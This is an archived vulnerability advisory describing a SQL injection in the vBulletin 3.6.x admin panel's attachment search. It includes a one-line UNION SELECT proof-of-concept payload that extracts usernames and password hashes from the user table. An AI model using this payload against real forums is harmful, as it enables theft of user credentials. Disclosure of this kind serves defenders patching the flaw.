TUCoPS :: Web BBS :: Frequently Exploited :: c07-2675.htm

vbulletin admincp sql injection
vbulletin admincp sql injection
vbulletin admincp sql injection


/****************************************/

CREDIT:
discovered by meto5757 and disfigure

PRODUCT:
vBulletin
http://www.vbulletin.com/ 

VULNERABILITY:
SQL Injection

NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5

POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:

') union select 1,1,1,1,1,userid,password,1,username from user -- 9

greets: w4ck1ng.com

/****************************************/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH